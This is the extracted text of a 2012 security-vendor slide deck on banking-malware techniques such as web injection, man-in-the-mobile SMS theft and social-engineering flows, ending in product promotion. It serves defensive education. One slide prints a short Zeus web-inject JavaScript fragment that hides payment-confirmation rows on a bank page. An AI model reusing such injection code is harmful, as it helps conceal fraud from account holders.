Transcript Title

No Silver Bullet
How Malware Defeats Security Measures
and What You Can Do About it
Ziv Cohen – Director, EMEA
April 2012
1
© 2012 Trusteer Confidential
© 2012 Trusteer Confidential
Malware Attacks Are on the Rise
 Malware incidents increased more
than 30% between 2008 and
2011, causing significant damage

54 million U.S. adults said they
had incidents of malware on their
desktops in 2011
Research - Use a Layered Security Approach
to Combat Phishing and Malware-Based Attacks
Published: 26 March 2012
2
© 2012 Trusteer Confidential
Online Banking Fraud is Happening
Online Banking Fraud Losses Estimated at 1B$ in US and Europe
3
© 2012 Trusteer Confidential
New Online Banking Services Adoption Hindered by
Security Concerns
What are the main reasons you have decided not to use mobile banking?
My banking needs are being met without
mobile banking
57%
I’m concerned about the security of
mobile banking
48%
I don't trust the technology to properly
process my banking transaction
22%
The cost of data access on my wireless
plan is too high
18%
It is too difficult to see on my mobile
phone’s screen
17%
Other
13%
It’s difficult or time consuming to set up
mobile banking
10%
I don’t have a banking account with which
to use mobile banking
It is not offered by my bank or credit union
My bank charges a fee for using mobile
banking
Refuse to answer
9%
3%
2%
1%
Federal Survey - Consumers and Mobile Financial Services March 2012
4
© 2012 Trusteer Confidential
The Cost of Advanced Malware Attack
40%
of CIOs report malware related
internal breaches
2010 Deloitte-NASCIO Cyber Security Study
49%
of data breaches incorporated
malware
Verizon 2010 Data Breach Report
760
Almost
companies attacked with the
same resources as RSA
20% of the Fortune 100 are on this list.
Krebsonsecuirty.com, “Who else was hit by RSA Attackers”?”
55
© 2012
2010 Trusteer Confidential
The end point is the weak link
Easy
End Point
User
Sensitive Data
and Apps
Easy
Cyber
Criminals
66
Difficult
© 2012 Trusteer Confidential
Anatomy of Malware attack
Attack
Launch
Execute
Fraud /
Information
Theft
Malware
Infection
User
Target
Phishing,
Drive-by-Download
7
System exploit,
Malicious Code
install
Credentials theft,
Web injection,
Social engineering
Human and
Automated
© 2012 Trusteer Confidential
Attack Setup, Execute Fraud:
Man-in-the-Browser, Web Injection
Login:
Password:
****
PII Theft
8
Credentials
Theft
Social
Engineering
© 2012 Trusteer Confidential
Keeping Banks In the Dark - Change Phone
1
User
Access site
2
Malware
Update user’s phone number
4
1800TrueNum
1800ToFraud
3
Bank
5
Sends a confirmation SMS to
previous phone, with code and
new phone number
Malware
Inform user that the bank has issued a
FREE SIM CARD for security reasons,
user enters code to accept offer`
Fraudster
“Enters conformation code and
redirects all future bank SMS/Calls
to 1800ToFraud
Confirmation
Code: 1234
For number
1800ToFraud
9
© 2012 Trusteer Confidential
Confirmation Emails - Hidden
1
2
From
YourFriend
Trusteed Bank
Jack
JackBoss
Friend
Bill
BillWife
Boss
Jill
Jill Wife
Malware Transfer
Money
Bank Sends
Confirmation Email
Subject
Transaction
Confirmation
- Money Transfer
Party
Saturday
Night
Party Saturday Night
Promotion
Promotion
Love
You
Love You
3
Sent
12:03
Tue 13 Dec 2011 12:02
12:02
Tue 13 Dec 2011 12:01
12:01
Tue 13 Dec 2011 12:00
Tue 13 Dec 2011 12:00
Malware Hide
Confirmation Email
Zeus code for hiding emails
if( document.getElementById("datatable").rows[i].innerHTML.indexOf(
"Faster Payment Confirmation" ) != -1 ||
document.getElementById("datatable").rows[i].innerHTML.indexOf(
"Payment Created" ) )
{ //Faster Payment Confirmation | Payment Created
document.getElementById("datatable").rows[i].style.display =
"none";
}
10
© 2012 Trusteer Confidential
Keeping Banks In the Dark - DDoS
FBI warning about Banking Trojan “GAMEOVER”
“After the accounts are
compromised, the
perpetrators conduct a
Distributed Denial of
Service (DDoS) attack on
the financial institution”
11
© 2012 Trusteer Confidential
Facebook/Ukash – Cross Channel Attack
To confirm verification you have to enter 20 euro UKash
voucher. Ukash vouchers are sold by UKash.com website and
Ukash.com is not affiliated with Facebook company. 20 euro
will be added to your Facebook main account balance. This
verification is used to confirm your age and country of origin.
The UKash Voucher consists of 19 numbers and face value
(sum), begins on “633”. For example 6337757575757
12
© 2012 Trusteer Confidential
MITMO/ZITMO
8
Transaction
approved using
stolen SMS
Malware
Command &
Control
4
1
Download
Malware
7
5
Malware forwards
approval SMS
3
SMS with link to
Mobile malware
(“install new
certificate”)
2
5
User Accesses
Site
“Please provide
your mobile phone
number”
Malware
transfers funds
(PC is proxy)
6
13
Legitimate Website
Transaction
Approval SMS
© 2012 Trusteer Confidential
FFIEC Recognizes Malware as the
Root Cause of Most Cybercrime Activities
“Controls implemented in conformance
with the Guidance several years ago have
become less effective..”
“Malware can compromise some of the
most robust online authentication
techniques”
14
© 2012 Trusteer Confidential
The Challenge: No Silver Bullet
15
Device Identification
Challenge Questions
Malware
OTP Devices
Man in the Browser,
Real Time Phishing
Transaction
Verification
Man in the Mobile
Transaction
Signing
Social Engineering
Malware
Virtual Browser
on Stick
Memory Injection
Malware
Clickstream
Detection
Malware adopts
Human-like behavior
x
Bypassed
© 2012 Trusteer Confidential
Intelligent, Adaptive, Automated
Threat
Intelligence
16
16
Adaptive
Protection
Sustainable
Cybercrime
Prevention
© 2012 Trusteer Confidential
Crime Logic vs. Files and Signatures
Threat Intelligence
Adaptive Protection
Trusteer: What it does?
Crime Logic (100s)
Exploit
Anti-Virus
17
Infect
Hook
Inject
Access
Theft
Legacy: What it is?
Files and Signatures (1000000s)
?
?
© 2012 Trusteer Confidential
First to Discover New Forms of Malware
Threat Intelligence
Adaptive Protection
Tens of Millions
of Endpoints
Endpoints Detect
and stop Crime Logic
OddJob
Shylock
Sunspot
Torpig v2
SpitMo for
Android
Ramnit goes
financial
18
© 2012 Trusteer Confidential
Ready, Before the Threat Reaches You
Threat Intelligence
Adaptive Protection
Tens of Millions
of Endpoints
Endpoints Detect
and stop Crime Logic
OddJob
Shylock
Sunspot
Torpig v2
SpitMo for
Android
Ramint goes
financial
19
© 2012 Trusteer Confidential
Process, People, Products
Threat Intelligence
Adaptive Protection
Cybercrime
Intelligence
Fraud Alert
Crime Logic
Analytics &
Management
Corp
Crime
Logic

Unknown
crime logic
Risk
Assessment
Trusteer
Intelligence
Center

Adaptive
Protection
Known
crime logic
Online
Threats
20
© 2012 Trusteer Confidential
Trusteer Cybercrime Prevention Architecture:
Industry leading solution for Online Cybercrime Activities
 Intelligencebased risk
assessment
 Multi-layer
protection
against
malware
 No malware =
Transaction
anomaly
prevention
Detect malwareinfected users,
devices
Detect and Stop
real-time
phishing
Trusteer Pinpoint
for Malware
Detection
Stop and
remove financial
malware,
phishing
Trusteer Rapport
for PC/Mac
Trusteer Pinpoint
for Phishing
Detection
Trusteer Rapport
for Mobile
Protect against
mobile
malware, high
risk devices
Less Cost, Less Complexity
21
© 2012 Trusteer Confidential
Thank You
22
© 2012 Trusteer Confidential
© 2012 Trusteer Confidential